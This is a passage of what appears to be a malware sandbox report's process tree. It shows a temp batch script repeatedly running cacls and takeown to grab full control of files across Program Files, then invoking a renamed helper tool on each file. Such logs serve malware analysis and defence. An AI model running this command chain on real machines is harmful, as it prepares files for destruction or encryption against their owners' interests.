    - Modifies file permissions
    PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3468
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:3324
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:3384
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3408
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3448
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:3488
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui""
  2⤵
  PID:3412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:3528
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:3352
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3368
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui""
  2⤵
  PID:1300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui"
    3⤵
    PID:3524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:1988
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:3588
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3392
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui""
  2⤵
  PID:2324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:1336
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:3564
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2440
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui""
  2⤵
  PID:1084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui"
    3⤵
    PID:308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:2844
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:2580
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2248
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp""
  2⤵
  PID:2644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G Admin:F /C
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"
    3⤵
    PID:276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Genko_1.jtp" -nobanner
    3⤵
    PID:332
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Genko_1.jtp" -nobanner
      4⤵
      PID:2916
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui""
  2⤵
  PID:2756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui"
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:1920
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:2016
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui""
  2⤵
  PID:1620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui"
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:2464
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:220
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:3976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:2252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2516
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:3680
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:2164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:3660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3620
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:984
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  2⤵
  PID:3776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
    3⤵
    PID:916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
    3⤵
    PID:3740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "adobepdf.xdc" -nobanner
    3⤵
    PID:3844
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "adobepdf.xdc" -nobanner
      4⤵
      PID:3792
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:3892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    PID:3808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:3052
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:1080
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3956
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui""
  2⤵
  PID:3924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\jnwmon.dll.mui"
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:1088
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:1040
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3936
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""
  2⤵
  PID:1688
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:744
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:1820
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui""
  2⤵
  PID:2056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui"
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:3096
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:2452
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2712
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui""
  2⤵
  PID:3080
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui"
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:3120
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:3220
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\Journal.exe""
  2⤵
  PID:3136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C
    3⤵
    PID:4016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Journal.exe"
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Journal.exe" -nobanner
    3⤵
    PID:2888
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Journal.exe" -nobanner
      4⤵
      PID:2592
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4008
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""
  2⤵
  PID:2140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C
    3⤵
    PID:4024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"
    3⤵
    PID:2504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Seyes.jtp" -nobanner
    3⤵
    PID:2412
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Seyes.jtp" -nobanner
      4⤵
      PID:1452
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  PID:4040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    PID:3124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:2872
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "classes.jsa" -nobanner
      4⤵
      PID:3952
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui""
  2⤵
  PID:2604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui"
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:1900
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:1224
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3196
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:3280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    PID:3320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1732
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3308
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:3088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    PID:3180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:2104
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:1136
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""
  2⤵
  PID:3244
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"
    3⤵
    - Modifies file permissions
    PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "license.html" -nobanner
    3⤵
    PID:3288
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "license.html" -nobanner
      4⤵
      PID:3324
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  PID:4092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
    3⤵
    PID:4088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
    3⤵
    PID:3336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "add_reviewer.gif" -nobanner
    3⤵
    PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      PID:900
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""
  2⤵
  PID:3496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C
    3⤵
    PID:3436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"
    3⤵
    PID:3516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "forms_received.gif" -nobanner
    3⤵
    PID:2388
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "forms_received.gif" -nobanner
      4⤵
      PID:3420
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  PID:3252
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:3580
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    PID:1988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "reviews_super.gif" -nobanner
    3⤵
    PID:3392
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "reviews_super.gif" -nobanner
      4⤵
      PID:840
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  PID:2460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "submission_history.gif" -nobanner
    3⤵
    PID:2440
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "submission_history.gif" -nobanner
      4⤵
      PID:2724
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2200
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  PID:1400
- - C:\Windows\SysWOW64\cacls.exe
